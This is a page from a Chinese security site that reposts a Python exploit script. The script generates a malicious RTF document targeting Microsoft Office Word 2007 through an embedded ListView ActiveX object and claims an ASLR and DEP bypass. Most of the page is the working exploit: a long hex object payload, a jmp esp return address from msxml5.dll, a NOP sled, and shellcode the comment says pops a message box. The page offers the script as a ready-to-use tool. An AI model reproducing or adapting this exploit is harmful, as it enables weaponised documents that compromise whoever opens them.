首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass) Exploit
来源:infogen.al 作者:R-73eN 发布时间:2015-03-20  
# Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass
# Date : 28/02/2015
# Author : R-73eN
# Software : Microsoft Office Word 2007
# Tested : Windows 7 Starter
   
   
import sys
# Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode .
shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7'
#filecontent
content="{\\rtf1"
content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}"
content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par"
content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par"
content+="{\\object\\objocx"
content+="{\\*\\objdata"
content+="\n"
content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000"
content+="00000000000000000E0000"
content+="\n"
content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000"
content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF"
content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400"
content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000"
content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628"
content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00"
content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000"
content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF"
content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000"
content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF"
content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000"
content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000"
content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000"
content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400"
content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600"
content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080"
content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974"
content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000"
content+="000000000000"
content+= 'cb818278'# Address=788281CB jmp esp |  {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll)
content+="9090909090909090" #nops
content+= shellcode
#junk
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000"
content+="\n"
content+="}"
content+="}"
content+="}"
banner = "\n\n"
banner +="  ___        __        ____                   _    _  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __        / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \      / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |    / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_|[] /_/   \_\_____|\n\n"
print banner
if(len(sys.argv) < 2):
    print '\n Usage : exploit.py filename.rtf'
else:
    filename = sys.argv[1]
    f=open(filename,"w")
    f.write(content)
    f.close()
    print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TWiki Debugenableplugins Remot
·Publish-It 3.6d - Buffer Overf
·FastStone Image Viewer 5.3 .tg
·Publish-It 3.6d - PUI Buffer O
·Fortinet Single Sign On Stack
·GoAutoDial CE 2.0 - Shell Uplo
·iPass Mobile Client Service Pr
·Adobe Flash Player PCRE Regex
·Brasero CD/DVD Burner 3.4.1 Bu
·Free MP3 CD Ripper Buffer Over
·Adobe Flash Player PCRE Regex
·Firefox Proxy Prototype Privil
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved